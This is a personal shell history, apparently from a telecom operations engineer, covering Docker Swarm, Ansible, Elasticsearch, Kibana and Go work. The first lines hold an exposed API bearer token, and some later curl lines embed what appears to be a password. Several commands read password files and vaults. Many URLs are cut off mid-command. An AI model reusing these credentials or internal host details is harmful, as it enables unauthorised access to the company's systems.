eyJrIjoidDM1TFNMWU15Q1VQR1RiMFR2bTVKcFM4Z3NjVHpLdVMiLCJuIjoiZXhwb3J0LWRhc2hib2FyZCIsImlkIjoxfQ==s.hbx.geo.francetelecom.fr/api/search +curl -s -H "Accept: application/json" -H "Authorization: Bearer eyJrIjoidDM1TFNMWU15Q1VQR1RiMFR2bTVKcFM4Z3NjVHpLdVMiLCJuIjoiZXhwb3J0LWRhc2hib2FyZCIsImlkIjoxfQ=="s.hbx.geo.francetelecom.fr/api/search +./export-dashboards.sh +kubectl config +false +true +ll +export PF=ref04 +mdk node label | grep -E "grafana|" +PF=ref01 mdk node labels | grep -E "grafana|" +mdk ss +ll +export PF=ref04 +g f +g prb +mdk ss +mdk up +mdk up +mdk redeploy +mdk ss +mdk up +mdk ss +mdk ps grafana +history | grep ansible +ansible-playbook -i inventory/ref04 beats.yml +go help test +go help test | grep -E "race|" +go help test | grep -E "race" +go test -race +g co master +g f +g prb +go test -race $(go list ./... | grep -v /vendor/) +go help +go --help +go build help +go help build +ansible-playbook -i inventory/ref04 docker-setup-swarm.yml +mdk ssw +g f +g prb +g status +vi .gitignore +rm -fr sandbox/ +cat .mdk.env +export PF=toto +unset PF +g st +g ci .gitignore +g push +mdk logs -tf --since logstash +mdk logs -tf logstash +mdk st +g st +mdk d service update --force %%_logstash +cat my-compose.yml +vi my-compose.yml +mdk d service update --scale=2 %%_logstash +mdk d service help +mdk d service help scale +mdk d service scale help +mdk d service scale %%_logstash=2 +mdk ps +mdk ps logstash +mdk d service scale %%_logstash=5 +mdk logs -tf --since logstash +mdk logs -tf logstash +mdk ps logstash +mdk ps curator +mdk ps logstash +mdk logs -tf logstash.3 +docker -H ssh://es016.metriks.prod.s1.p.fti.net ps | grep logstash +docker -H ssh://es016.metriks.prod.s1.p.fti.net logs -tf c4b95aa2be1d +vi my-compose.yml +vi build/securite/sophia/ +vi my-compose.yml +mdk up +vi build/securite/sophia/docker-compose.yml +vi build/securite/onyx/docker-compose.yml +g f +f prb +g prb +g stash +g prb +g stash pop +g st +g diff +vi settings.yml +vi settings.yml +g lg +g f +g prb +g stash +g prb +g stash pop +vi settings.yml +vi conf/logstash/01_input_prod.conf +gst +mdk up +mdk ssw +mdk d service scale %%_logstash=3 +mdk ps logstash +mdk logs -tf conf-injector +mdk ps logstash +mdk logs -tf --since 5m logstash +mdk logs -tf logstash +mdk logs -tf --tail 10 logstash +cat conf/logstash/20_output.conf +grep "ELASTICSEARCH_HOST" * +grep -rni "ELASTICSEARCH_HOST" * +mdk exec logstash bash +vi build/securite/onyx/docker-compose.yml +mdk logs -tf --tail 10 logstash +vi settings.yml +mdk up +mdk ps es-data-speed +mdk ps es-dataspeed +mdk ps esdata-speed +mdk ps esdata-speed | head +mdk logs -tf --since 1m esdata-speed +mdk ps esdata-speed | head +docker -H ssh://es016.metriks.prod.s1.p.fti.net ps -a | grep securite +docker -H ssh://es016.metriks.prod.s1.p.fti.net logs 076314b7bf58 +vi build/securite/onyx/docker-compose.yml +mdk ps es-master +docker -H ssh://es012.metriks.prod.s1.p.fti.net ps | grep 86po +docker -H ssh://es012.metriks.prod.s1.p.fti.net ps | grep securite_es-master +docker -H ssh://es012.metriks.prod.s1.p.fti.net stop 48c22cab0a68 +mdk ss +docker -H ssh://es012.metriks.prod.s1.p.fti.net start 48c22cab0a68 +mdk ss +mdk ssw +mdk up +mdk d service scale %%_logstash=2 +mdk ps logstash +mdk logs -tf --since 2m logstash +ssh es006.metriks.prod.s1.p.fti.net +mdk ps logstash +mdk logs -tf --since 2m esdata-speed +mdk ssw +ssh es007.metriks.prod.s1.p.fti.net +ssh es017.metriks.prod.s1.p.fti.net +ssh es002.metriks.prod.s1.p.fti.net +ssh es002.metriks.prod.s1.p.fti.net +ssh es017.metriks.prod.s1.p.fti.net +ssh es017.metriks.prod.s1.p.fti.net +ll +ssh es017.metriks.prod.s1.p.fti.net +cat sett +ll +g f +g prb +ll +cat settings.yml +g st +rm -fr sandbox +g st +g remote -v +g clsearch.orangeportails.net/metriks/instance/vault-preprod +g cl git@ssh.code.search.hbx.geo.francetelecom.fr:metriks/instance/vault-preprod.git +cat settings.yml +git-crypt unlock ~/.metriks-git-crypt.key +g cl +ll +cat settings.yml +g f +g prb +cat settings.yml +mdk build +vi .mdk.env +mdk build +vi settings.yml +vi .mdk.env +mdk build +vi build/vault-preprod/sophia/docker-compose.yml +ll +vi conf/curator/auditbeat.json +vi conf/curator/filebeat.json +vi conf/curator/backup-all.json +vi conf/curator/backup-kibana.json +vi conf/curator/force-merge.json +vi conf/curator/metriks.json +vi conf/curator/monitoring.json +vi conf/curator/backup-kibana.json +vi conf/curator/backup-all.json +ll +cat auditbeat.json +for f in $(ls *.json) ; do echo $f : $(jq -r '.cron' $f) ; done +for f in $(ls *.json) ; do echo $f ; done +for f in $(ls *.json) ; do echo $f: ; done +for f in $(ls *.json) ; do echo "$f: $(jq '.' $f)"; done +for f in $(ls *.json) ; do echo "$f: $(jq '.cron' $f)"; done +for f in $(ls *.json) ; do echo "$f: $(jq -r'.cron' $f)"; done +for f in $(ls *.json) ; do echo "$f: $(jq -r '.cron' $f)"; done +ssh es001.metriks.prod.s1.p.fti.net +ssh es011.metriks.prod.s1.p.fti.net +ll +ll +vi build/vault-preprod/sophia/docker-compose.yml +ll +ssh es011.metriks.prod.s1.p.fti.net +ssh es017.metriks.prod.s1.p.fti.net +vi my-compose.yml +mdk build +vi my-compose.yml +mdk build +vi .vimrc +ll +g f +g prb +ll +cp ~/.vimrc . +g diff +g ci +g ci .vimrc +g push +ll +ssh es017.metriks.prod.s1.p.fti.net +ll +mdk up +vi my-compose.yml +mdk up +alias +vi my-compose.yml +mdk up +g st +g ci my-compose.yml +g add my-compose.yml +g ci +g push +cp ../vault-preprod/my-compose.yml . +g st +g f +g prb +mdk up +g add my-compose.yml +g ci +g push +ssh es017.metriks.prod.s1.p.fti.net +prodsophiatunnel +g diff +ll +vi settings.yml +mdk up +ssh es106.eui.prod.metriks.m1.p.fti.net +gi diff +g diff +g ci +g add +g add . +g ci +g push +ssh node001.bas.k8s.m1.p.fti.net +ssh node001.bas.k8s.s1.p.fti.net +ssh node002.bas.k8s.s1.p.fti.net +ssh node003.bas.k8s.s1.p.fti.net +git remote set-url origin git@gitlab.si.francetelecom.fr:melvis/tools/stack-builder.git +git remote set-url origin git@gitlab.si.francetelecom.fr:melvis/tools/mdk.git +git remote set-url origin git@gitlab.si.francetelecom.fr:melvis/tools/wait-n-check.git +g f +export PF=ref05 +export PF=ref05 +mds ss +mdk ss +g diff +g f +g prb +g push +mdk down +mdk ss +mdk up +mdk ss +ansible-playbook -i inventory/ref05 beats.yml +mdk ss +ssh data001.ref05.conso.qualif.gen01.ke.p.fti.net +ansible-vault help +ansible-vault view group_vars/all/vault_all.yml +ansible-vault edit group_vars/all/vault_all.yml +curls.metriks.orangeportails.net/ +curls.metriks.orangeportails.net/ +ansible inventory/ -m ping +ansible inventory/ref01 -m ping +ansible inventory/ref01/host -m ping +ansible --help +ansible -i inventory/ref01 all -m ping +ansible -i inventory all -m ping +ansible inventory/ref01/host -m setup | less +ansible -i inventory/ref01 all -m setup +ansible -i inventory/ref01 all -m setup -a "filter=ansible_processor_vcpus" +ansible --help +ansible-doc setyp +ansible-doc setup +ansible -i inventory/ref01 all -m setup -a "filter=ansible_processor_vcpus" -o +ansible -i inventory/ref04 all -m setup -a "filter=ansible_processor_vcpus" -o +ansible -i inventory/ref05 all -m setup -a "filter=ansible_processor_vcpus" -o +ansible -i inventory/basic all -m setup -a "filter=ansible_processor_vcpus" -o +ansible all -m setup -a "filter=ansible_processor_vcpus" -o -i inventory/basic +ansible * -m setup -a "filter=ansible_processor_vcpus" -o -i inventory/basic +ansible '*' -m setup -a "filter=ansible_processor_vcpus" -o -i inventory/basic +ansible prod-montsouris -m setup -a "filter=ansible_processor_vcpus" -o -i inventory/basic +ansible -i inventory/basic prod-montsouris -m setup -a "filter=ansible_processor_vcpus" -o +ansible -i inventory/djingo rod-montsouris -m setup -a "filter=ansible_processor_vcpus" -o +ansible -i inventory/djingo all -m setup -a "filter=ansible_processor_vcpus" -o +ansible -i inventory/djingo manager -m setup -a "filter=ansible_processor_vcpus" -o +ansible -i inventory/ref01 all -m setup -a "filter=ansible_processor_vcpus" -o +ansible -i inventory/djingo all -m setup -a "filter=ansible_processor_vcpus" -o +#ansible -i inventory/djingo all -m setup -a "filter=ansible_processor_vcpus" -o +ll /home/orobardet/dev/_metriks/infra/inventory/djingo +ll +tree inventory/ +ansible -i inventory/basic all -m setup -a "filter=ansible_processor_vcpus" -o +ansible -i inventory/djingo all -m setup -a "filter=ansible_processor_vcpus" -o +mdk ss +ansible-playbook -i inventory/ref05 docker-setup-swarm.yml +mdk ssw +export PF=onyx +export PF=onyx +mdk ss +mdk up +mdk ss +mdk ps kibana +mdk redeploy +mdk ss +mdk ss +mdk d config ls +mdk d config ls --filter="name=infra" +mdk ss +# mdk d service rm %%_portainer %%_metricbeat +mdk d config rm infra_filebeat infra_filebeat-fields infra_metricbeat infra_metricbeat infra_metricbeat_system infra_metricbeat_traefik +mdk ss +mdk up +mdk ss +mdk d service rm %%_filebeat +mdk ss +curl +host kibana-mash-sophia.metriks.hbx.geo.francetelecom.fr +host traefik-infra-onyx.metriks.hbx.geo.francetelecom.fr +curl +curl +ssh admin.infra.s1.p.fti.net +mdk ps traefik +mdk logs -tf traefik +mdk logs -tf --tail 10 traefik +curl +ll +mdk ss +ansible-playbook -i inventory/onyx beats.yml +ansible-playbook -i inventory/onyx docker-setup-swarm.yml +git clonesi.francetelecom.fr/list/ext-vcs-etcd-io-etcd/ +export PF=ref05 +mdk ss +mdk logs -f grafana +ssh admin.infra.multis.p.fti.net +ansible -i inventory/djingo all -m setup -a "filter=ansible_processor_vcpus" -o +ansible -i inventory/eui all -m setup -a "filter=ansible_processor_vcpus" -o +ansible -i inventory/localsearch all -m setup -a "filter=ansible_processor_vcpus" -o +ansible -i inventory/mdcs all -m setup -a "filter=ansible_processor_vcpus" -o +ansible -i inventory/onyx all -m setup -a "filter=ansible_processor_vcpus" -o +ansible -i inventory/search all -m setup -a "filter=ansible_processor_vcpus" -o +ansible -i inventory/ref01 all -m setup -a "filter=ansible_processor_vcpus" -o +ansible-playbook -i inventory/onyx -t role_xymon_client_configure -C -D init_pfs.yml +ansible-playbook -i inventory/onyx --list-tag -C -D init_pfs.yml +ansible-playbook -i inventory/onyx -t role_xymon_client -C -D init_pfs.yml +ansible-playbook -i inventory/onyx -t role_xymon_client init_pfs.yml +ansible -i inventory/preprod all -m setup -a "filter=ansible_processor_vcpus" -o +ssh es014.metriks.prod.s1.p.fti.net +ansible-playbook -i inventory/onyx -t role_xymon_client init_pfs.yml +ll +git remote -v +git remote set-url origin git@gitlab.si.francetelecom.fr:melvis/docker-images/cerebro.git +g co master +g f +f prb +g prb +ll +ll +rm -fr testortsandbox/ test_sandbox/ +ll +mdk ls +mdk down +rm -fr stack-6-6/ +ll +rm -fr test-stack-builder-1.1.1/ test_stackuilder65/ +mkdir test-stack-ort +df -h . +mdk init stackbuilder +ll +vi settings.yml +ll +cat settings.yml +cat settings.yml +docker build -t sfy-metriks-registry-dev.af.multis.p.fti.net/metriks/cerebro:0.8.3 . +vi settings.yml +docker info +docker build -t sfy-metriks-registry-dev.af.multis.p.fti.net/metriks/cerebro:0.8.3 . +docker system prune +docker build -t sfy-metriks-registry-dev.af.multis.p.fti.net/metriks/cerebro:0.8.3 . +sudo ls /etc/docker/ +sudo vi /etc/docker/daemon.json +sudo systemctl restart docker +journalctl -u docker +sudo journalctl -u docker +sudo vi /etc/docker/daemon.json +sudo systemctl restart docker +sudo systemctl stop docker +sudo systemctl start docker +sudo journalctl -fu docker +sudo vi /etc/docker/daemon.json +sudo service restart docker +sudo service docker restart +docker info +docker system prune +sudo apt update +docker build -t sfy-metriks-registry-dev.af.multis.p.fti.net/metriks/cerebro:0.8.3 . +docker push sfy-metriks-registry-dev.af.multis.p.fti.net/metriks/cerebro:0.8.3 +mdk ss +mdk up +mdk ssw +mdk info +cat passwords +ll +mdk up +mdk ssw +mdk logs -tf cerebro +mdk up +mdk logs -tf cerebro +mdk logs -tf --since 2m cerebro +mdk ss +mdk logs -tf --since 2m cerebro +docker build -t sfy-metriks-registry-dev.af.multis.p.fti.net/metriks/cerebro:0.8.3 . && docker push sfy-metriks-registry-dev.af.multis.p.fti.net/metriks/cerebro:0.8.3 +mdk up +mdk logs -tf --since 2m cerebro +ssh tool005.dev.search.m1.p.fti.net +docker build -t sfy-metriks-registry-dev.af.multis.p.fti.net/metriks/cerebro:0.8.3 . && docker push sfy-metriks-registry-dev.af.multis.p.fti.net/metriks/cerebro:0.8.3 +ps aux +ps +ps ux +mdk up +kill -9 14359 +cleaar +clear +docker build -t sfy-metriks-registry-dev.af.multis.p.fti.net/metriks/cerebro:0.8.3 . && docker push sfy-metriks-registry-dev.af.multis.p.fti.net/metriks/cerebro:0.8.3 +mdk up +mdk logs -tf --since 1m cerebro +mdk info +ssh admin.infra.multis.p.fti.net +mdk up +mdk logs -tf --since 1m cerebro +ssh tool006.dev.search.m1.p.fti.net +mdk exec cerebro bash +mdk up +ps aux | grep -i goland +ll +g f +g st +ll +go version +mkdir es-rgpd-extractor +mv es-rgpd-extractor gdpr-es-extractor +rmdir gdpr-es-extractor/ +g cl git clone git@gitlab.si.francetelecom.fr:melvis/tools/gdpr-es-extractor.git +git clone git@gitlab.si.francetelecom.fr:melvis/tools/gdpr-es-extractor.git +ll +go mod +go mod init +go mod init --help +go mod init help +go mod help init +go mod init gdpr-es-extractor +ll +cat go.mod +rm go.mod +go mod init gdpr-es-extractor +cat go.mod +g remote -v +make +git rev-parse HEAD +go build +ll +./gdpr-es-extractor +./gdpr-es-extractor version +go test +rm gdpr-es-extractor +make +g push +g push -u origin master +make test +make checks +l +ll +vi .env +ll +ll +mdk ss +mdk info +ll +ll +vi settings.yml +mdk up +mdk ss +vi settings.yml +vi settings.yml +mdk up +ll +vi settings.yml +mdk ss +mdk logs -tf kibana +mdk logs -tf --tail 10 kibana +mdk ss +ll +vi settings.yml +mdk up +mdk ss +mdk logs -tf --tail 10 kibana +mdk ss +cat passwords +mdk ss +ll +vi settings.yml +cp ../formation/my-compose.yml . +vi my-compose.yml +vi my-compose.yml +mdk up +ll +g clstic/kibana kibana-src +ll +grep -rni "data_visualizer" +grep -rni "data_visualizer" * +ll +rm -fr kibana-src/ +ls +g f +g prb +history | grep ansible-playbook +ansible-playbook -i inventory/eui -t role_xymon_client init_pfs.yml +ll inventory/ +yarn install +ansible-playbook -i inventory/djingo -t role_xymon_client init_pfs.yml +g br +g br -a +g co 6.6 +yarn install +node --version +dpkg -S $(which node) +apt-cache policy nodejs +grep -rni 10.15.2 +grep -rni "10.15.2" +grep -rni 10.15.2 +grep -ni 10.15.2 +grep -ni "10.15.2" * +vi package.json +yarn install +ll +ll +ll +ll +ll +vi roles +vi passwords +vi searchguard/sg_internal_users.yml +vi searchguard/sg_roles.yml +yarn global add swaglint +vint +sudo apt install yamllint +htop +yarn global add bash-language-server +go get -u github.com/sourcegraph/go-langserver +ll +vi main.go +vi ~/.vimrc +vi main.go +ansible-playbook -i inventory/mdcs -t role_xymon_client init_pfs.yml +vi ~/.vimrc +vi main.go +vi ~/.vimrc +vi main.go +vi ~/.vimrc +vi main.go +vi ~/.vimrc +vi main.go +vi ~/.vimrc +vi main.go +vi ~/.vimrc +ll +ll +g st +ps aux | grep -i goland +htop +cat my-compose.yml +history | grep docker +df -h +docker build -t sfy-metriks-registry-dev.af.multis.p.fti.net/metriks/cerebro:0.8.3 . && docker push sfy-metriks-registry-dev.af.multis.p.fti.net/metriks/cerebro:0.8.3 +mdk up +mdk logs -tf --since 2m cerebro +ll /etc/ldap.conf +cat /etc/ldap.conf +ll /etc/ssl/certs/ca-certificates.crt +mdk exec cerebro bash +mdk up +dpkg -L hebex-ca-certificates +mdk up +mdk logs -tf --since 1m cerebro +mdk up +mdk exec cerebro bash +mdk up +cat passwords +mdk up +mdk exec cerebro bash +mdk up +mdk ss +mdk exec cerebro bash +mdk d service update --force %%_cerebro +mdk up +mdk logs -tf --since 1m cerebro +ps aux +ps aux | grep -i go +ll +g f +g prb +mdk ss +mdk ps +mdk ss +host kibana-divisu-rec.metriks.hbx.geo.francetelecom.fr +curl +curl +curl +curl -H "Host: kibana-divisu-rec.metriks.hbx.geo.francetelecom.fr" " +curlsu-rec.metriks.hbx.geo.francetelecom.fr +host kibana-divisu-rec.metriks.hbx.geo.francetelecom.fr +curl -H "Host: kibana-divisu-rec.metriks.hbx.geo.francetelecom.fr" " +curl -k -H "Host: kibana-divisu-rec.metriks.hbx.geo.francetelecom.fr" " +host +curl -k -H "Host: kibana-divisu-rec.metriks.hbx.geo.francetelecom.fr" +ll +g cl git clone git@gitlab.si.francetelecom.fr:melvis/sondes/watch-docker.git +git clone git@gitlab.si.francetelecom.fr:melvis/sondes/watch-docker.git +ll +g br +g br -a +g co continuous-deployment +g co --help +g co -- continuous-deployment +g co --no-guess -- continuous-deployment +g co --no-guess continuous-deployment +g br +g co --help +g co . -- continuous-deployment +g co --no-guess . -- continuous-deployment +g st +g co continuous-deployment -- +git --version +mdk d node ls +ll +vi settings.yml +vi conf/searchguard/sg_roles_mapping.yml +vi settings.yml +df -h +yarn global install elasticdump +yarn global add elasticdump +curl -u orobardets.hbx.geo.francetelecom.fr/ +curl -u orobardets-djingo-prod.metriks.hbx.geo.francetelecom.fr/ +curl -u orobardets-djingo-dev-ref01.metriks.hbx.geo.francetelecom.fr/ +curl -u orobardets-djingo-dev-ref01.metriks.hbx.geo.francetelecom.fr/_cat/indices?v +curl -u orobardets-djingo-dev-ref01.metriks.hbx.geo.francetelecom.fr/_cat/indices?v | grep conversation-history-v8-prod-2019 +pass --help +pass ls +pass insert ldap-orobardet +pass ldap-orobardet +curl -u orobardet -p $(pass ldap-orobardet)s-djingo-dev-ref01.metriks.hbx.geo.francetelecom.fr/_cat/indices?v | grep conversation-history-v8-prod-2019 +man curl +curl -u orobardet -P $(pass ldap-orobardet)s-djingo-dev-ref01.metriks.hbx.geo.francetelecom.fr/_cat/indices?v | grep conversation-history-v8-prod-2019 +man curl +curl -u orobardet:$(pass ldap-orobardet)s-djingo-dev-ref01.metriks.hbx.geo.francetelecom.fr/_cat/indices?v | grep conversation-history-v8-prod-2019 +curl -s -u orobardet:$(pass ldap-orobardet)s-djingo-dev-ref01.metriks.hbx.geo.francetelecom.fr/_cat/indices?v | grep conversation-history-v8-prod-2019 +curl -s -u orobardet:$(pass ldap-orobardet)s-djingo-dev-ref01.metriks.hbx.geo.francetelecom.fr/_cat/indices?v | grep conversation-history-v8-prod-2019 | awk '{$3}' +curl -s -u orobardet:$(pass ldap-orobardet)s-djingo-dev-ref01.metriks.hbx.geo.francetelecom.fr/_cat/indices?v | grep conversation-history-v8-prod-2019 | awk '$3' +curl -s -u orobardet:$(pass ldap-orobardet)s-djingo-dev-ref01.metriks.hbx.geo.francetelecom.fr/_cat/indices?v | grep conversation-history-v8-prod-2019 | awk '{print $3}' +ll +curl -s -u orobardet:$(pass ldap-orobardet)s-djingo-dev-ref01.metriks.hbx.geo.francetelecom.fr/_cat/indices?v | grep conversation-history-v8-prod-2019 | awk '{print $3}' > djingo-indices +exho $PATH +echo $PATH +echo $PATH | grep yarn +yarn bin +yarn global bin +ll /home/orobardet/.yarn/bin +vi ~/.bash_vars +export PATH=$PATH:${HOME}/.yarn/bin +ll +elasticdump +elasticdump --help +ll +for index in $(cat djingo-indices) ; do echo $index ; done +for index in $(cat djingo-indices) ; do elasticdump --inputss ldap-orobardet)es-djingo-dev-ref01.metriks.hbx.geo.francetelecom.fr/$index --outputss ldap-orobardet)es-ort-stack-ref01.metriks.hbx.geo.francetelecom.fr/$index --type settings ; done +for index in $(cat djingo-indices) ; do elasticdump --inputss ldap-orobardet)@es-djingo-dev-ref01.metriks.hbx.geo.francetelecom.fr/$index --outputss ldap-orobardet)@es-ort-stack-ref01.metriks.hbx.geo.francetelecom.fr/$index --type settings ; done +for index in $(cat djingo-indices) ; do elasticdump --input --type settings ; done +for index in $(cat djingo-indices) ; do elasticdump --debug --input --type settings ; done +ll +vi ~/.bash_utils +vi ~/.bashrc +. ~/.bash_utils +pass ldap-orobardet | urlencode +pass ldap-orobardet +urlencode $(pass ldap-orobardet) +for index in $(cat djingo-indices) ; do elasticdump --debug --input --type settings ; done +for index in $(cat djingo-indices) ; do elasticdump --debug --input --type mapping ; done +for index in $(cat djingo-indices) ; do elasticdump --debug --input --type analyzer ; done +for index in $(cat djingo-indices) ; do elasticdump --input --type data ; done +ll +make run +make run help +RUNARGS=help make run +RUNARGS=help make runll +RUNARGS=--help make runll +RUNARGS=--help make run +RUNARGS=--toto make run +RUNARGS=help make run +RUNARGS=version make run +ssh injector001.metriks.prod.m1.p.fti.net +ssh orobardet@injector001.metriks.prod.m1.p.fti.net +RUNARGS=version make run +RUNARGS=--version make run +make check +ll +ll +cat passwords +ll +ls +lsa -lsa +ls -lsa +vi ~/.vimrc +make check +ll +g br +g f +g f -p +g br -a +g br -d 37-retrait-metricbeat +ll +vi compose/docker-compose.yml +vi ~/.vimrc +ssh orobardet@injector001.metriks.prod.m1.p.fti.net +ssh -vv orobardet@injector001.metriks.prod.m1.p.fti.net +ssh-add -l +vi /home/orobardet/.ssh/config +ssh -vv orobardet@injector001.metriks.prod.m1.p.fti.net +vi /home/orobardet/.ssh/config +ssh -vv injector001.metriks.prod.m1.p.fti.net +ssh -vv injector001.metriks.prod.s1.p.fti.net +ssh -vv injector001.metriks.prod.m1.p.fti.net +vi compose/docker-compose.yml +vi ~/.vimrc +yamllint --help +vi ~/.config/yamllint/config +mkdir -p ~/.config/yamllint/ +vi ~/.config/yamllint/config +vi compose/docker-compose.yml +yamllint compose/docker-compose.yml +ll ~/.config/yamllint/config +yamllint -c ~/.config/yamllint/config compose/docker-compose.yml +ll $XDG_CONFIG_HOME/yamllint/config +yamllint -d relaxed compose/docker-compose.yml +yamllint compose/docker-compose.yml +man yamllint +vi compose/docker-compose.yml +vi ~/.config/yamllint/config +g diff +mdk up +PF=ref04 mdk up +PF=ref05 mdk up +ll +cp .bashrc dev/_perso/linux-conf/work/orgn/ +cp .bash_utils dev/_perso/linux-conf/work/orgn/ +ll +g st +g ad . +g add . +g st +ll +g ci +g push +vi compose/docker-compose.yml +PF=onyx mdk ss +PF=onyx mdk up +g add . +g ci +g f +g prb +g push +vi main.go +ansible-playbook --help +PF=onyx mdk ss +ll +PF=onyx mdk ss +PF=onyx mdk d service rm %%_filebeat +PF=onyx mdk ss +ll +PF=onyx mdk ss +mdk d service update --force %%_kibana +ssh es001.metriks.prod.s1.p.fti.net +ssh atlas002.ref02.conso.qualif.gen01.ke.p.fti.net +ssh ke@atlas002.ref02.conso.qualif.gen01.ke.p.fti.net +docker run --rm -it sfy-search-registry-build.artifactory.packages.install-os.multis.p.fti.net/build/php-build +df -h +docker ps +docker run --rm -it sfy-search-registry-build.artifactory.packages.install-os.multis.p.fti.net/build/php-build:5.3 +docker run --rm -it sfy-search-registry-build.artifactory.packages.install-os.multis.p.fti.net/build/php-build:5.3 bash +docker run --rm -it sfy-search-registry-build.artifactory.packages.install-os.multis.p.fti.net/build/php-build:5.5 bash +docker run --rm -it sfy-search-registry-build.artifactory.packages.install-os.multis.p.fti.net/build/php-build:7.0 bash +docker run --rm -it sfy-search-registry-build.artifactory.packages.install-os.multis.p.fti.net/build/php-build:7.1 bash +docker run --rm -it sfy-search-registry-build.artifactory.packages.install-os.multis.p.fti.net/build/php-build:7.2 bash +docker system prune -a +docker run --rm -it service-os-ubuntu-docker.artifactory.si.francetelecom.fr/ubuntu:18.04 bash +docker system prune -a +df -h +ssh injector001.metriks.prod.m1.p.fti.net +ssh -v injector001.metriks.prod.m1.p.fti.net +ssh -vv injector001.metriks.prod.m1.p.fti.net +ssh orobardet@injector001.metriks.prod.m1.p.fti.net +RUNARGS="fields" make run +ssh es002.metriks.prod.s1.p.fti.net +ssh es015.metriks.prod.s1.p.fti.net +RUNARGS="-u toto fields" make run +RUNARGS="fields" make run +ll +g f +g prb +mdk ss +mdk pd +mdk ps +mdk ps kibana +mdk logs -tf --since 12m kibana +mdk d service update --force %%_djingo +mdk d service update --force %%_kibana +mdk ps +mdk ss +RUNARGS="-u toto fields" make run +RUNARGS="-u toto -i blu fields" make run +make check +RUNARGS="-u toto -i blu fields" make run +mdk info +cat passwords +RUNARGS="-u toto -u titi -i blu fields" make run +RUNARGS="-u toto,titi -i blu fields" make run +RUNARGS="-u toto titi -i blu fields" make run +RUNARGS="-u toto,titi -i blu fields" make run +ll +g f +g prb +ll +cat passwords +make check +make checks +RUNARGS="help fields" make +RUNARGS="help fields" make run +RUNARGS="fields" make run +make checks +ll +ll +ll +umount wait-n-check/ +ll +ll wait-n-check/ +mkdir /home/orobardet/dev/go/src/gitlab.si.francetelecom.fr/melvis/tools/wait-n-check +mkdir -p /home/orobardet/dev/go/src/gitlab.si.francetelecom.fr/melvis/tools/wait-n-check +mkdir -p /home/orobardet/dev/go/src/gitlab.si.francetelecom.fr/melvis/tools/tools/gdpr-es-extractor +sudo umount wait-n-check/ +sudo mount /home/orobardet/dev/go/src/gitlab.si.francetelecom.fr/melvis/tools/wait-n-check +sudo mount /home/orobardet/dev/go/src/gitlab.si.francetelecom.fr/melvis/tools/tools/gdpr-es-extractor +ll /home/orobardet/dev/go/src/gitlab.si.francetelecom.fr/melvis/tools/ +rm -fr /home/orobardet/dev/go/src/gitlab.si.francetelecom.fr/melvis/tools/tools/ +mkdir -p /home/orobardet/dev/go/src/gitlab.si.francetelecom.fr/melvis/tools/gdpr-es-extractor +sudo mount /home/orobardet/dev/go/src/gitlab.si.francetelecom.fr/melvis/tools/gdpr-es-extractor +sudo vi /etc/fstab +ll +g st +make secucheck +go mod vendor +make secucheck +male check +make check +make secucheck +g f +g prb +cat passwords +curl s7HxWwXuXpqBM43b@kibana-divisu.metriks.hbx.geo.francetelecom.fr/" +host kibana-divisu.metriks.hbx.geo.francetelecom.fr +host kibana-divisu-sophia.metriks.hbx.geo.francetelecom.fr +curl s7HxWwXuXpqBM43b@kibana-divisu-sophia.metriks.hbx.geo.francetelecom.fr/" +curl s7HxWwXuXpqBM43b@kibana-divisu.metriks.hbx.geo.francetelecom.fr/" +make check +make secucheck +make check +make secucheck +make +make check secucheck +ssh es005. +ssh es005.metriks.prod.s1.p.fti.net +go get -u github.com/securego/gosec/cmd/gosec +go mod tidy +go mod vendor +go get -u github.com/securego/gosec/cmd/gosec +make check secucheck +ll .build/ +lh .build/ +g remote -a +g remote -v +RUNARGS=help make run +g co 1-extraire-les-champs-d-un-index-pattern-avec-information-de-base +g stash +g co 1-extraire-les-champs-d-un-index-pattern-avec-information-de-base +g co master +g f +g prb +g stash pop +g st +RUNARGS=help make run +RUNARGS="help fields" make run +gcl +gcl i +ll +vi settings.yml +PF=onyx mdk ss +PF=onyx mdk ps kibana +PF=onyx mdk up +g f +g prb +g lg +PF=onyx mdk up +PF=onyx mdk ss +export PF=onyx +mdk ss +PF=onyx mdk +PF=onyx mdk ss +ssh es001.metriks.prod.s1.p.fti.net +ssh es005.metriks.prod.s1.p.fti.net +ll +go mod tidy +wget -O gdpr-es-extractor si.francetelecom.fr/list/sfy-metriks_generic/gdpr-es-extractor/latest/gdpr-es-extractor.linux-amd64" +chmod +x gdpr-es-extractor +ll +lh +./gdpr-es-extractor +./gdpr-es-extractor version +./gdpr-es-extractor --versop, +./gdpr-es-extractor --version +ll +upx +upx -9 gdpr-es-extractor +ll +lh +rm gdpr-es-extractor +ll +ls +ls -lsa +exit +sudo apt update +sudo apt upgrade +sudo reboot +ls -lsa +ll +exit +xterm +exit +ll +uptime +ll +ls +ll +ls -lsa +htop +vi ~/.vimrc +sudo visudo -f /etc/sudoers.d/orobardet +dpkg -l | grep fim +dpkg -l | grep vim +apt-cache policy vim +dpkg -l | grep terminator +ll +ll +vi compose/docker-compose.yml +vi conf/traefik/traefik.toml +mdk ss +mdk up +mdk ss +mdk ps traefik +PF=ref04 mdk up +PF=ref04 mdk ss +PF=ref05 mdk up +PF=ref05 mdk ss +PF=ref05 mdk ps traefik +PF=onyx mdk ps traefik +PF=onyx mdk ss +PF=onyx mdk up +PF=onyx mdk d service rm %%_filebeat +PF=onyx mdk ss +PF=onyx mdk ps traefik +ll +PF=mdcs mdk ss +PF=mdcs mdk ps +PF=mdcs mdk up +PF=djingo mdk ss +PF=djingo mdk ps +PF=djingo mdk up +PF=djingo mdk ss +PF=mdcs mdk ss +gem install colorls +sudo gem install colorls +colorls +ll +c lang +clang +sudo apt install clang +g cl git clonesebastiencs/icons-in-terminal.git +git clonesebastiencs/icons-in-terminal.git +ll +./install-autodetect.sh +ll +./print_icons.sh +./install.sh +./print_icons.sh +vi ~/.config/fontconfig/conf.d/30-icons.conf +vi ~/.config/fontconfig/conf.d/30-icons.conf +./print_icons.sh +./install-autodetect.sh +vi ~/.config/fontconfig/conf.d/30-icons.conf +./print_icons.sh +g cl git@github.com:ryanoasis/nerd-fonts.git +g cl git@github.com:sebastiencs/ls-icons.git +ll +df -h +docker system prune -a +ll +ll +git status +g cl git@github.com:sebastiencs/ls-icons.git +./bootstrap +export CC=clang CXX=clang++ +./configure --prefix=/opt/coreutils +autopoint +sudo apt install autotool +sudo apt install autotools-dev +df -h . +sudo apt install autopoint +df -h +git checkout -f HEAD +df -h . +docker df +htop +sudo apt install bison +df -h . +sudo apt install gperf makinfo +sudo apt install gperf makeinfo +./bootstrap +gperf +sudo apt install gperf +sudo apt install textinfo +sudo apt install texinfo 